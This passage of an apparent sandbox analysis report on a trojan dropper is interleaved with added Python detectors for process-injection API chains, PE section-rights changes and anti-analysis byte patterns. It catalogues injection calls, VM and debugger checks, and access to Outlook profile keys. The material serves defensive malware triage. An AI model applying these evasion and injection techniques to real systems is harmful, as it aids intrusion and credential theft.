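# Lines copied from this report (process 3, vfpbkeeo.exe).
REPORT_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E98A0 NtWriteVirtualMemory, 3_2_009E98A0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009EB040 NtSuspendThread, 3_2_009EB040
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E99D0 NtCreateProcessEx, 3_2_009E99D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9950 NtQueueApcThread, 3_2_009E9950
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009EA3B0 NtGetContextThread, 3_2_009EA3B0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009EAD30 NtSetContextThread, 3_2_009EAD30
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009EA770 NtOpenThread, 3_2_009EA770
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9760 NtOpenProcess, 3_2_009E9760
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9FE0 NtCreateMutant,LdrInitializeThunk, 3_2_009E9FE0
""".strip().splitlines()

# Constructed benign line (not from the report): an installer that only touches files.
BENIGN_LINES = [
    r"Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00401000 CreateFileW,WriteFile,CloseHandle, 0_2_00401000",
]


def api_sets(lines):
    """Collect the set of API names each process image was seen calling."""
    seen = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a "Code function" line; skip rather than guess
        apis = {a.strip() for a in m.group("apis").split(",") if a.strip()}
        seen.setdefault(m.group("proc"), set()).update(apis)
    return seen


def stages_for(apis):
    """Which injection stages the observed API names cover."""
    return {stage for stage, names in STAGES.items() if apis & names}


def match_chains(apis):
    """Return {chain: missing stages}; an empty set means the whole chain was observed."""
    present = stages_for(apis)
    return {chain: needed - present for chain, needed in CHAINS.items()}


def flag(lines):
    """(process image, chain) pairs where every stage of the chain was observed in that process."""
    hits = []
    for proc, apis in api_sets(lines).items():
        for chain, missing in match_chains(apis).items():
            if not missing:
                hits.append((proc, chain))
    return sorted(hits)


if __name__ == "__main__":
    for proc, chain in flag(REPORT_LINES):
        print(f"{chain:<18} {proc}")
```

The match is deliberately per process image rather than per function: in this sample the stages are spread over separate thunks (3_2_009E99D0, 3_2_009E98A0, 3_2_009EAD30, ...), so a per-function rule would miss the chain. The trade-off is that a large legitimate binary that happens to import all of these will also match; treat a hit as a triage lead to confirm against the process tree and the "System process connects to network" finding, not as proof on its own.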
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe ReversingLabs: Detection: 42%
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Virustotal: Detection: 42%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Jump to behavior
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Process created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Process created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe File created: C:\Users\user\AppData\Local\Temp\nsjF9DB.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/5@12/10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404AB5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: vfpbkeeo.exe, 00000001.00000003.309270547.000000001A050000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000001.00000003.309553217.0000000019EC0000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: vfpbkeeo.exe, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
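Added example, not part of the report: the static findings above (".text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ" and "DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE") and the "Unpacked PE file ... .text:ER;.rdata:R;.data:W; vs .text:ER;" finding in the Data Obfuscation section below all come from two PE header fields: the section Characteristics dword and the optional header's DllCharacteristics word. The Python below reads both from raw bytes without pefile, renders section rights in the report's E/R/W notation, and compares an on-disk layout with a dumped one. The PE images it runs on are constructed header-only stubs built by build_pe32 (an assumption for the example, not the sample's real headers).

```python
import struct

# Section Characteristics bits (winnt.h)
IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000

# Optional header DllCharacteristics bits (winnt.h)
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def build_pe32(sections, dll_characteristics):
    """Constructed test input: a header-only PE32 image with the given
    (name, characteristics) sections. Not a real binary, just enough for the parser."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)                                        # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<H", opt, 70, dll_characteristics)        # DllCharacteristics
    hdrs = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                    0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(sections))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs


def parse_headers(data):
    """Return (DllCharacteristics, [(section name, Characteristics), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]    # same offset in PE32 and PE32+
    first = opt + opt_size
    sections = []
    for i in range(nsections):
        off = first + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", data, off + 36)[0]    # Characteristics is the last dword
        sections.append((name, chars))
    return dll_chars, sections


def perms(chars):
    """Render section rights the way the report does: E, R, W."""
    bits = ((IMAGE_SCN_MEM_EXECUTE, "E"), (IMAGE_SCN_MEM_READ, "R"), (IMAGE_SCN_MEM_WRITE, "W"))
    return "".join(letter for bit, letter in bits if chars & bit)


def section_layout(data):
    """'.text:ER;.rdata:R;.data:W;' summary, the form used by the 'Unpacked PE file' finding."""
    return "".join(f"{name}:{perms(chars)};" for name, chars in parse_headers(data)[1])


def dll_characteristic_names(data):
    dll_chars = parse_headers(data)[0]
    return [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit]


def audit(data):
    """Triage findings for one image; an empty list means nothing stood out."""
    dll_chars, sections = parse_headers(data)
    findings = []
    for name, chars in sections:
        p = perms(chars)
        if "E" in p and "W" in p:
            findings.append(f"{name}: writable and executable ({p}), typical of a self-unpacking stub")
        if chars & IMAGE_SCN_CNT_CODE and "E" not in p:
            findings.append(f"{name}: flagged CNT_CODE but not executable")
    if not dll_chars & 0x0100:
        findings.append("NX_COMPAT not set: DEP is opt-out for this image")
    if not dll_chars & 0x0040:
        findings.append("DYNAMIC_BASE not set: image loads at a fixed address")
    return findings


def rights_changed(on_disk, in_memory):
    """True when the dumped image's section rights differ from the on-disk file's,
    which is what the 'changes PE section rights' signature reacts to."""
    return section_layout(on_disk) != section_layout(in_memory)


# Constructed images mirroring the layouts the report prints.
ON_DISK = build_pe32([(".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)], 0x8540)
UNPACKED = build_pe32([(".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
                       (".rdata", IMAGE_SCN_MEM_READ),
                       (".data", IMAGE_SCN_MEM_WRITE)], 0x8540)
PACKED_RWX = build_pe32([("UPX0", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)], 0)
```

Two caveats when applying this to real samples. A clean-looking header on disk proves little here: the installer stub in this report has NX_COMPAT and DYNAMIC_BASE set and a plain ER .text, and the unpacking only shows up when the dumped image is compared against the file, which is why rights_changed works on two inputs. And section rights are advisory for code that calls NtProtectVirtualMemory at run time, so treat the static view as one input to the verdict, not the verdict.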

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Unpacked PE file: 3.2.vfpbkeeo.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00410A64 push ecx; ret 1_2_00410A77
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0040A846 push cs; retf 3_2_0040A847
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00411320 push ds; retf 3_2_00411322
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0040DC2C pushfd ; iretd 3_2_0040DC3A
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0040B4FA push ecx; ret 3_2_0040B501
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0040AD0D push 255F11F9h; retf 3_2_0040AD18
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0041B674 pushad ; retf 3_2_0041B678
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00401E20 push eax; ret 3_2_00401E22
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009FD0D1 push ecx; ret 3_2_009FD0E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe File created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX (13 identical entries)
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 identical entries)

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Windows\SysWOW64\cmd.exe TID: 5936 Thread sleep time: -48000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D6A60 rdtscp 3_2_009D6A60
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 889 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 862 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00A407DA GetSystemInfo, 1_2_00A407DA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_004089B8 FindFirstFileExW, 1_2_004089B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @%SystemRoot%\System32\mswsock.dll,-60201-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000003.446841530.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000004.00000003.449986076.000000000858E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c9
Source: explorer.exe, 00000004.00000000.322563528.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 00000004.00000000.327263504.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.574282998.0000000008394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.322563528.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SPS
Source: explorer.exe, 00000004.00000002.576863468.000000000CDEA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000004.00000003.565329897.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.577506261.000000000D009000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: explorer.exe, 00000004.00000003.451089971.000000000CFB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.447484524.000000000CFB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000002.574282998.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00401754
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_0040B06F GetProcessHeap, 1_2_0040B06F
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009D6A60 rdtscp 3_2_009D6A60
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Process token adjusted: Debug Jump to behavior
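Added example, not part of the report: the push/ret sequences listed under Data Obfuscation (push ecx; ret, push cs; retf, pushfd; iretd, push 255F11F9h; retf, pushad; retf), the rdtscp at 3_2_009D6A60, and the long run of "mov eax, dword ptr fs:[00000030h]" reads that follow are all short, fixed byte patterns, which is how a sandbox or a YARA-style scanner spots them without a full disassembler. The Python below is a single linear scanner for those patterns, run over a constructed byte string that contains each sequence from this report once. The opcode encodings are standard IA-32; the "kind" labels and the sample buffer are my own.

```python
# x86 register names by encoding index (used by push r32 and ModRM reg field)
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
SEGS = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds"}   # push sreg opcodes
RETS = {0xC3: "ret", 0xCB: "retf"}


def _fs_kind(disp):
    # fs:[0x30] is the PEB pointer in the 32-bit TEB; other offsets stay in the TEB itself.
    return "peb-read" if disp == 0x30 else "teb-read"


def _match(buf, i):
    """Decode one suspicious sequence at buf[i]; return (length, kind, text) or None."""
    b, n, op = buf, len(buf) - i, buf[i]
    # push imm32 ; ret/retf : a disguised jmp to the pushed address
    if op == 0x68 and n >= 6 and b[i + 5] in RETS:
        target = int.from_bytes(b[i + 1:i + 5], "little")
        return 6, "push-ret", f"push 0x{target:08x}; {RETS[b[i + 5]]}"
    # push r32 ; ret/retf : jump through a register
    if 0x50 <= op <= 0x57 and n >= 2 and b[i + 1] in RETS:
        return 2, "push-ret", f"push {REGS[op - 0x50]}; {RETS[b[i + 1]]}"
    # push sreg ; retf, pushad ; retf, pushfd ; iretd : junk that breaks linear sweep
    if op in SEGS and n >= 2 and b[i + 1] == 0xCB:
        return 2, "push-ret", f"push {SEGS[op]}; retf"
    if op == 0x60 and n >= 2 and b[i + 1] == 0xCB:
        return 2, "push-ret", "pushad; retf"
    if op == 0x9C and n >= 2 and b[i + 1] == 0xCF:
        return 2, "push-ret", "pushfd; iretd"
    # mov eax, fs:[disp32]  (64 A1 disp32, the short form the report shows)
    if op == 0x64 and n >= 6 and b[i + 1] == 0xA1:
        disp = int.from_bytes(b[i + 2:i + 6], "little")
        return 6, _fs_kind(disp), f"mov eax, fs:[0x{disp:x}]"
    # mov r32, fs:[disp32]  (64 8B modrm disp32 with mod=00, rm=101)
    if op == 0x64 and n >= 7 and b[i + 1] == 0x8B and (b[i + 2] & 0xC7) == 0x05:
        reg = REGS[(b[i + 2] >> 3) & 7]
        disp = int.from_bytes(b[i + 3:i + 7], "little")
        return 7, _fs_kind(disp), f"mov {reg}, fs:[0x{disp:x}]"
    # timing checks used to detect single-stepping and slow emulators
    if op == 0x0F and n >= 3 and b[i + 1] == 0x01 and b[i + 2] == 0xF9:
        return 3, "timing", "rdtscp"
    if op == 0x0F and n >= 2 and b[i + 1] == 0x31:
        return 2, "timing", "rdtsc"
    return None


def scan(buf, base=0):
    """Linear byte scan; returns [(address, kind, text), ...] in address order."""
    hits, i = [], 0
    while i < len(buf):
        m = _match(buf, i)
        if m:
            length, kind, text = m
            hits.append((base + i, kind, text))
            i += length
        else:
            i += 1
    return hits


def summarize(hits):
    """Count hits per kind, the shape a triage rule would threshold on."""
    counts = {}
    for _, kind, _ in hits:
        counts[kind] = counts.get(kind, 0) + 1
    return counts


# Constructed buffer (not bytes from the sample): each sequence from the report once,
# padded with nops, as if mapped at 0x401000.
CONSTRUCTED_CODE = bytes.fromhex(
    "9090"            # nop; nop
    "51C3"            # push ecx; ret
    "0ECB"            # push cs; retf
    "1ECB"            # push ds; retf
    "9CCF"            # pushfd; iretd
    "68F9115F25CB"    # push 0x255F11F9; retf
    "60CB"            # pushad; retf
    "50C3"            # push eax; ret
    "64A130000000"    # mov eax, fs:[0x30]
    "648B0D30000000"  # mov ecx, fs:[0x30]
    "0F01F9"          # rdtscp
    "90"              # nop
)

if __name__ == "__main__":
    for addr, kind, text in scan(CONSTRUCTED_CODE, 0x401000):
        print(f"{addr:#010x} {kind:<9} {text}")
```

The scanner does not disassemble, so the same bytes inside an immediate or a string will match too (a 0x51 0xC3 pair inside a constant looks like push ecx; ret). That is acceptable for ranking a dump, which is how the counts above are meant to be used, but each hit that matters should be confirmed in a disassembler before it goes into a report. The fs:[0x30] reads are only meaningful for 32-bit code; a 64-bit process reaches the PEB through gs:[0x60], which this scanner deliberately does not cover.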
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00A4005F mov eax, dword ptr fs:[00000030h] 1_2_00A4005F
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00A4013E mov eax, dword ptr fs:[00000030h] 1_2_00A4013E
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00A40109 mov eax, dword ptr fs:[00000030h] 1_2_00A40109
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00A4017B mov eax, dword ptr fs:[00000030h] 1_2_00A4017B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A9080 mov eax, dword ptr fs:[00000030h] 3_2_009A9080
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DF0BF mov ecx, dword ptr fs:[00000030h] 3_2_009DF0BF
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DF0BF mov eax, dword ptr fs:[00000030h] 3_2_009DF0BF
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DF0BF mov eax, dword ptr fs:[00000030h] 3_2_009DF0BF
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A23884 mov eax, dword ptr fs:[00000030h] 3_2_00A23884
